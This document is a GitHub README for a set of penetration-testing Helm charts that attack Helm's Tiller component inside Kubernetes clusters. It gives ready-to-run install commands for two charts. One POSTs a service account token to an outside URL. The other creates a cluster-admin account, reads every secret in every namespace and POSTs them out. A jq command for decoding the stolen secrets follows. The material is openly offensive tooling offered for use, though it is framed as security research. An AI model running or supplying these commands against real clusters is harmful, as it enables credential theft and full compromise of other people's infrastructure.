Skip to content

Latest commit

 

History

History
53 lines (37 loc) · 2.95 KB

README.md

File metadata and controls

53 lines (37 loc) · 2.95 KB
Raw

About

These are a few Helm Charts I've made to help exfiltrate data or privesc when you're in a Kubernetes Cluster and have access to Tiller, but not to the Kubernetes API.

For more information, see my blogpost about attacking Tiller from inside a cluster: https://blog.ropnop.com/attacking-default-installs-of-helm-on-kubernetes/

Charts

To use these charts, you must first initialize Helm, then you can install the charts directly from the repo:

$ helm init --client-only
$ helm install --repo https://ropnop.github.io/pentest_charts/ <chart_name> [options]

exfil_sa

This chart deploys a job designed to simply POST the pod's service account token to a URL. This is useful if you have access to Tiller and know a specific service account who's token you'd like to steal. It takes the following values:

  • name - the name of the release, job and pod.
  • serviceAccountName - the service account to use (and therefore the token that will be exfil'd)
  • exfilURL - the URL to POST the token to. Make sure you have a listener on that URL to catch it! (I like using a serverless function)
  • namespace - defaults to kube-system, but you can override it

Usage:

helm install --name tiller-deployer --set serviceAccountName=tiller --set exfilURL="https://datadump-slack-dgjttxnxkc.now.sh" --repo https://ropnop.github.io/pentest_charts exfil_sa_token

This will POST the token in the body of an HTTP request to exfilURL.

To clean up: helm delete --purge <release_name>

exfil_secrets

This chart creates a new service account with cluster-admin privileges, then deploys a job with that new service account to read all the secrets in every namespace from the Kubernetes API and POST the data back to an exfilURL.

It takes the following values:

  • name - the name of the release, job and pod.
  • serviceAccountName - the service account to use (and therefore the token that will be exfil'd)
  • exfilURL - the URL to POST the token to. Make sure you have a listener on that URL to catch it! (I like using a serverless function)
  • namespace - defaults to kube-system, but you can override it

Usage:

helm install --name tiller-deployer --set serviceAccountName="tiller-deployer" --set exfilURL="https://datadump-slack-dgjttxnxkc.now.sh/all_secrets.json" --repo https://ropnop.github.io/pentest_charts exfil_secrets

This will POST every Kubernetes secret in JSON form to the exfilURL. To parse through and quickly decode all the secrets, you can use jq:

cat all_secrets.json| jq '[.items[] | . as $secret| .data | to_entries[] | {namespace: $secret.metadata.namespace, name: $secret.metadata.name, type: $secret.type, created: $secret.metadata.creationTimestamp, key: .key, value: .value|@base64d}]'

To clean up: helm delete --purge <release_name>